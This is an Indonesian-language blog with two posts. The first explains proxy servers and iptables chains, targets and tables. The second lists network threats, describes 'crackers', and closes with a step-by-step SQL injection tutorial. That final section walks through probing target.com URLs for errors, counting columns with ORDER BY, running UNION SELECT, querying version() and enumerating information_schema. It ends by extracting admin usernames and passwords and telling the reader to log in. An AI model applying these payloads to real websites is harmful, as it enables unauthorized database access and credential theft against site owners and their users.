Keamanan Jaringan

Widget Animasi

Kamis, 15 September 2016

Keamanan Jaringan


Proxy Server
Hasil gambar untuk gambar proxy server

Assalamu’alaikum …
Hmm nampaknya agak lama ya saya tidak memposting materi baru hehe. Oya ngomong-ngomong setelah membahas materi tentang Kebijakan Penggunaan Jaringan serta Ancaman & Serangan dalam Jaringan  Komputer, kali ini saya akan membahas materi tentang “Proxy Server”.


Apa itu Proxy Server ??? 


I.      Pengertian
Proxy adalah komputer server yang berfungsi sebagai komputer lainnya untuk melakukan request terhadap konten dari Internet. Proxy bertindak sebagai gateway untuk setiap komputer klien. Web server yang menerima request dari proxy server akan menginterprestasikan request-request tersebut seolah-olah request tersebut datang langsung dari komputer klien, bukan dari komputer server. 
Proxy server juga dapat digunakan untuk mengamankan jaringan pribadi yang dihubungkan ke sebuah jaringan publik. Proxy server memiliki lebih banyak fungsi daripada router yang memiliki fitur packet filtering karena memang proxy server beroperasi pada level yang lebih tinggi dan memiliki kontrol yang lebih menyeluruh terhadap akses jaringan. Proxy menyediakan sumber daya baik dengan menghubungkan ke server tertentu atau dengan melayani dari cache. Dalam beberapa kasus, proxy dapat mengubah permintaan klien atau respon server untuk berbagai tujuan.

II.     Fungsi
Proxy Server merupakan pihak ketiga yang menjadi perantara antara kedua pihak yang saling berhubungan, dalam hal ini adalah jaringan lokal dan jaringan internet. Secara prinsip pihak pertama dan pihak kedua tidak langsung berhubungan, akan tetapi masing-masing berhubungan degan pihak ketiga yaitu proxy. Tiga fungsi utama proxy server adalah:
1.   Connection sharing
Bertindak sebagai gateway yang menjadi batas antara jaringan lokal dan jaringan luar. Gateway juga bertindak sebagai titik dimana sejumlah koneksi dari pengguna lokal akan terhubung kepadanya dan koneksi jaringan luar juga terhubung kepadanya. Dengan demikian koneksi dari jaringan lokal ke internet akan menggunakan sambungan yang dimiliki oleh gateway secara bersama-sama (connecion sharing).
2.   Filtering
Bekerja pada layar aplikasi sehingga berfungsi sebagai Firewalll paket filtering yang digunakan untuk melindungi jaringan lokal terhadap gangguan atau serangan dari jaringan luar. Dapat dikonfigurasi untuk menolak situs web tertenu pada waktu-waktu tertentu.
3.   Caching
Proxy Server memiliki mekanisme penyimpanan obyek-obyek yang sudah diminta dari server-server di internet. Mekanisme caching akan menyimpan obyek-obyek yang merupakan permintaan dari para pengguna yang di dapat dari iternet.

III.     Manfaat
Adapun manfaat proxy server adalah:
1.   Meningkatkan kinerja jaringan
Dengan kemampuan server proxy untuk menyimpan data permintaan dari aplikasi client, permintaan yang sama dengan permintaan sebelumnya hanya akan diambilkan dari simpanan server proxy. Jika seorang pengguna internet sudah pernah membuka situs yang sama, tidak perlu dihubungkan langsung pada situs sumbernya, tetapi cukup diambilkan dari simpanan server proxy. Dengan cara demikian, koneksi langsung pada server sumbernya dapat dikurangi. Dengan demikian, penggunaan bandwidth internet untuk koneksi langsung menjadi berkurang.
2.   Filter permintaan
Server proxy juga dapat digunakan sebagai filter terhadap permintaan data dari suatu situs. Dalam hal ini, server proxy menjadi filter terhadap situs yang boleh atau tidak boleh dikunjungi. Selain itu, server proxy juga dapat sebagai filter terhadap aplikasi client yang dapat menggunakan akses terhadap internet. Dalam hal ini server proxy berlaku sebagai filter terhadap gangguan internet.

IV.   Kelebihan
Kelebihan proxy server dalam suatu jaringan TCP/IP adalah:
1.  Keamanan jaringan lebih terjaga, karena adanya proxy sebagai pembatas antara jaringan lokal dan jaringan luar (internet).
2.  Pengaksesan kembali terhadap situs-situs yang telah diakses sebelumnya menjadi lebih cepat, karena pengaksesan tidak perlu ke jaringan luar (internet) melainkan ada pada direktori cache proxy.
3.  Terdapat fasilitas filtering, baik filtering pengguna, content dan waktu akses.

V.    Kekurangan
Kekurangan proxy server dalam suatu jaringan TCP/IP adalah:
1.  Pengaksesan terhadap situs yang belum pernah dibuka sebelumnya akan menjadi lebih lambat, karena client harus meminta terlebih dahulu ke pada proxy, setelah itu baru proxy yang akan meminta request dari client tersebut ke pada penyedia layanan internet.
2.  Bila proxy server terlambat melakukan update cache, maka client akan mendapatkan content yang belum update ketika melakukan request content tersebut.

VI.   Jenis-Jenis Proxy
Ada empat jenis server proxy :
1.     Transparan Proxy
Jenis server proxy yang mengidentifikasi dirinya sebagai server proxy dan juga membuat alamat IP asli tersedia melalui http header. Ini umumnya digunakan untuk kemampuan mereka untuk website cache dan tidak secara efektif memberikan anonimitas apapun untuk mereka yang menggunakannya. Namun, penggunaan proxy transparan akan membuat Anda terkena IP Banned. Ini transparan dalam hal alamat IP Anda terlihat publik, bukan transparan dalam istilah yang Anda tidak tahu bahwa Anda menggunakannya (sistem anda tidak secara khusus dikonfigurasi untuk menggunakannya)
2.     Anonymous Proxy
Jenis server proxy ini mengidentifikasi dirinya sebagai server proxy, tetapi tidak membuat alamat IP yang asli tersedia. Jenis server proxy terdeteksi, tetapi memberikan anonimitas wajar bagi sebagian besar pengguna.
3.     Distorting Proxy
Jenis server proxy ini mengidentifikasi dirinya sebagai server proxy, tetapi membuat alamat IP yang salah asli tersedia melalui http header.
4.     High Anonymous Proxy
Jenis server proxy ini tidak mengidentifikasi dirinya sebagai server proxy dan tidak menyediakan alamat IP asli.

VII.      Ip Tables
     Ip tables adalah suatu tools dalam sistem operasi linux yang berfungsi sebagai alat untuk melakukan filter (penyaringan) terhadap (trafic) lalulintas data. Secara sederhana digambarkan sebagai pengatur lalulintas data. Dengan iptables inilah kita akan mengatur semua lalulintas dalam komputer kita, baik yang masuk ke komputer, keluar dari komputer, ataupun traffic yang sekedar melewati komputer kita. Dengan kemampuan tools iptables, kita bisa melakukan banyak hal dengan iptables. Yang paling penting adalah bahwa dengan iptables ini kita bisa membuat aturan (rule), untuk arus lalulintas data. Aturan aturan itu dapat mencakup banyak hal, seperti besar data yang boleh lewat, jenis paket/datagram yang dapat diterima, mengatur trafic berdasar asal dan tujuan data, forwarding, nat, redirecting, pengelolaan port, dan firewall.

VIII.        Chain
Membahas prinsip dasar firewall iptables, mengelola akses internet berdasarkan alamat IP,port aplikasi dan MAC address dibutuhkan Chain/rantai yaitu digambarkan sebagai jalur aliran data diantaranya:
1.      Input
Mengatur paket data yang memasuki firewall dari arah intranet maupun internet. kita bisa mengelolakomputer mana saja yang bisa mengakses firewall. misal: hanya komputer IP 192.168.1.100 yang bisa SSHke firewall dan yang lain tidak boleh.
2.      Output
Mengatur paket data yang keluar dari firewall ke arah intranet maupun internet. Biasanya output tidak diset,karena bisa membatasi kemampuan firewall itu sendiri.
3.      Forward
Mengatur paket data yang melintasi firewall dari arah internet ke intranet maupun sebaliknya. Policy forward paling banyak dipakai saat ini untuk mengatur koneksi internet berdasarkan port, mac address dan alamat IP Selain aturan (policy) firewall iptables juga mempunyai parameter yang disebut dengan TARGET, yaitu status yang menentukkan koneksi di iptables:
a.      Accept
Akses diterima dan diizinkan melewati firewall.
b.      Reject
Akses ditolak, koneksi dari komputer klien yang melewati firewall langsung terputus, biasanya terdapatpesan “Connection Refused”. Target Reject tidak menghabiskan bandwidth internet karena akses langsung ditolak, hal ini berbeda dengan DROP.
c.    Drop
Akses diterima tetapi paket data langsung dibuang oleh kernel, sehingga pengguna tidak mengetahui kalau koneksinya dibatasi oleh firewall, pengguna melihat seakan – akan server yang dihubungi mengalami permasalahan teknis. Pada koneksi internet yang sibuk dengan trafik tinggi Target Drop sebaiknya jangan digunakan.
d.      Snat
Berguna untuk melakukan perubahan alamat asal paket (Source Network Address Translation). Target ini hanya berlaku untuk tabel nat pada chain POSTROUTING. Jika paket pertama dari satu koneksi mengalami SNAT, paket-paket berikutnya dalam koneksi juga akan mengalaminya.
e.      Dnat
Digunakan untuk melakukan translasi alamat tujuan (Destination Network Address Translation) pada header dari paket yang memenuhi aturan match. DNAT hanya bekerja untuk tabel nat pada chain PREROUTING dan OUTPUT atau chain buatan yang dipanggil oleh chain tersebut.
f.     Masquerade
Bekerja seperti SNAT tapi tidak memerlukan source Target ini hanya bekerja untuk tabel nat pada chain POSTROUTING.
g.    Redirect
Mengalihkan paket ke komputer itu sendiri. Mengarahkan paket yang menuju suatu port tertentu untuk memasuki proxy, berguna untuk membangun transparent proxy. Misal untuk mengalihkan semua koneksi yang menuju port http untuk memasuki aplikasi http proxy seperti squid. Hanya bekerja untuk tabel nat pada chain PREROUTING dan OUTPUT atau pada chain buatan dari chain tersebut.
h.      Prerouting
Chain yang digunakan untuk keperluan perlakuan sebelum packet masuk route. Biasanya dipakai untuk proses NAT.
i.      Postrouting
Chain yang digunakan untuk keperluan perlakuan sesudah packet masuk route. Biasanya dipakai untuk proses NAT.

IX.     Table
1.      Nat
Mentranslasikan (menggantikan) alamat asal atau tujuan dari sebuah paket. Contoh apabila satu buah PC Client yang beralamat IP private memberikan request agar terkoneksi ke internet dari gateway dan di terima oleh PC Router, sedangkan hanya PC Router yang memiliki alamat IP public, maka agar client dapat terkoneksi ke internet, IP private tadi ditranslasikan (digantkan) requestnya oleh PC Router dengan IP public miliknya, kemudian hasil request disambungkan kembali ke PC Client, sehingga PC Client dapat mengakses internet.
2.     Mangle
Melakukan penghalusan (mangle) paket, seperti TTL, TOS dan MARK.
3.      Filter
Menentukan paket yang akan di-DROP, LOG, ACCEPT atau REJECT.


Nah, mungkin itu saja yang dapat saya bahas dalam materi “Proxy Server”. Mohon maaf jika ada kesalahan, semoga bermanfaat dan apabila ada kritik dan saran silakan comment ya teman-teman:)

Wassalamu’alaikum …

Jumat, 12 Agustus 2016

Keamanan Jaringan




Ancaman & Serangan dalam Jaringan Komputer
Kali ini kita akan membahas ancaman & serangan dalam jaringan komputer. Apasih ancaman dalam jaringan komputer itu?
Ancaman merupakan suatu usaha dan kegiatan baik dari luar ataupun dalam yang dapat membahayakan keselamatan.
Serangan dalam jaringan komputer itu dibagi menjadi 2, yaitu :
1.    Serangan fisik terhadap keamanan jaringan
·   Terjadi gangguan pada kabel
·   Kerusakan Harddisk
·   Konsleting
·   Data tak tersalur dengan baik
·   Koneksi tak terdeteksi
·   Akses bukan pengguna
·   Pencurian perangkat keras komputer
·   Kerusakan pada komputer dan perangkat komunikasi jaringan
·   Wiretapping
·   Bencana alam

      2. Serangan logik terhadap keamanan jaringan
·   SQL Injection adalah Hacking pada sistem komputer dengan mendapat akses
Basis Data pada Sistem
·  DoS (Denial of Service) adalah Serangan pada Sistem dengan mengabiskan Resource pada Sistem
·  Request Flooding adalah Serangan dengan membanjiri banyak Request pada Sistem yang dilayani Host sehingga Request banyak dari pengguna tak terdaftar dilayani oleh layanan tersebut.
·  Deface adalah adalah Serangan pada perubahan tampilan.
·  Social Engineering adalah Serangan pada sisi sosial dengan memanfaatkan kepercayaan pengguna. Hal ini seperti fake login hingga memanfaatkan kelemahan pengguna dalam social media.
·  Malicious Code adalah Serangan dengan menggunakan kode berbahaya dengan menyisipkan virus, worm atau Trojan Horse.
·  Packet Sniffer adalah Serangan menangkap paket yang lewat dalam sebuah Jaringan.

Beberapa Bentuk Ancaman Jaringan :
·         Sniffer : Peralatan yang dapat memonitor proses yang sedang berlangsung.
·         Spoofing : Penggunaan komputer untuk meniru (dengan cara menimpa identitas atau alamat IP.
·         Phreaking : Perilaku menjadikan sistem pengamanan telepon melemah
·         Remote Attack : Segala bentuk serangan terhadap suatu mesin dimana penyerangnya tidak memiliki kendali terhadap mesin tersebut karena dilakukan dari jarak jaruh di luar sistem jaringan atau media transmisi.
·         Hole : Kondisi dari software atau hardware yang bisa diakses oleh pemakai yang tidak memiliki otoritas atau meningkatnya tingkat pengaksesan tanpa melalui proses autorisasi.
·         Hacker : Orang yang secara diam-diam mempelajari sistem yang biasanya sukar dimengerti untuk kemudian mengelolanya dan men-share hasil ujicoba yang dilakukannya. Hacker tidak merusak system
·         Craker
-       Orang yang secara diam-diam mempelajari sistem dengan maksud jahat
-       Muncul karena sifat dasar manusia yang selalu ingin membangun (salah satunya merusak)

Ciri-ciri cracker :
·         Bisa membuat program C, C++ atau pearl
·         Memiliki pengetahuan TCP/IP
·         Menggunakan internet lebih dari 50 jam per-bulan
·         Menguasai sistem operasi UNIX atau VMS
·         Suka mengoleksi software atau hardware lama
·         Terhubung ke internet untuk menjalankan aksinya
·         Melakukan aksinya pada malam hari, dengan alasan waktu yang memungkinkan, jalur komunikasi tidak padat, tidak mudah diketahui orang lain

Penyebab cracker melakukan penyerangan :
·         spite, kecewa, balas dendam
·         sport, petualangan
·         profit, mencari keuntungan dari imbalan orang lain
·         stupidity, mencari perhatian
·         cruriosity, mencari perhatian
·         politics, alasan politis

Ciri-ciri target yang dibobol cracker :
·         Sulit ditentukan
·         Biasanya organisasi besar dan financial dengan system pengamanan yang canggih
·         Bila yang dibobol jaringan kecil biasanya sistem pengamanannya lemah, dan pemiliknya baru dalam bidang internet

Ciri-ciri target yang “berhasil” dibobol cracker :
·         Pengguna bisa mengakses, bisa masuk ke jaringan tanpa “nama” dan “password”
·         Pengganggu bisa mengakses, merusak, mengubah atau sejenisnya terhadap data
·         Pengganggu bisa mengambil alih kendali system
·         Sistem hang, gagal bekerja, reboot atau sistem berada dalam kondisi tidak dapat dioperasikan

    Selanjutnya kita masuk ke materi langkah-langkah SQL Injection. SQL Injection adalah Hacking pada sistem komputer dengan mendapat akses Basis Data pada Sistem.
    SQL Injection merupakan cara hack website yang paling banyak digunakan oleh para hacker. Kenapa? Karena dengan melakukan SQL injection, kita dapat langsung mengetahui username dan password dari website yang akan kita bajak. Dibawah ini merupakan kumpulan dork yang dapat kita gunakan untuk mencari error dalam suatu website yang nantinya akan kita gunakan sebagai target SQLi.
1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah
http://www.target.com/berita.php?id=100
2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
Contoh :
http://www.target.com/berita.php?id=100' 
atau
http://www.target.com/berita.php?id=-100
3.  Maka akan muncul pesan error…
“    You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1″ Dan masih banyak lagi macamnya.
4. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya… Disini kita akan menggunakan perintah order by
Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*
“/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–”.  Kalo “+” sebagai penghubung perintah…
5. Nah sampe sini langsung dah nyobain satu2…
http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)
Sampai muncul error…
Misalkan errornya disini…
http://www.target.com/berita.php?id=100+order+by+10/*
Berarti yang kita ambil adalah “9″
http://www.target.com/berita.php?id=100+order+by+9/* 
6. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Lalu perhatikan angka berapa yang keluar.
7. Misalnya angka hoki yang keluar adalah “3″ maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
8. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database..
Contoh :
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL.
Misalnya yang kamu liat adalah table “admin”
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…
Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…
Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
Bisa diliat dah username ama passwordnya…Tinggal login…Cari yang asik terus…Terserah Anda...
Terimakasih sudang berkunjung...


Sumber : 
http://setya21.blogspot.co.id/2010/03/macam-macam-virus-dan-dampaknya.html
https://infohackomputer.wordpress.com/2012/12/02/hack-website-dengan-teknik-sql-injection/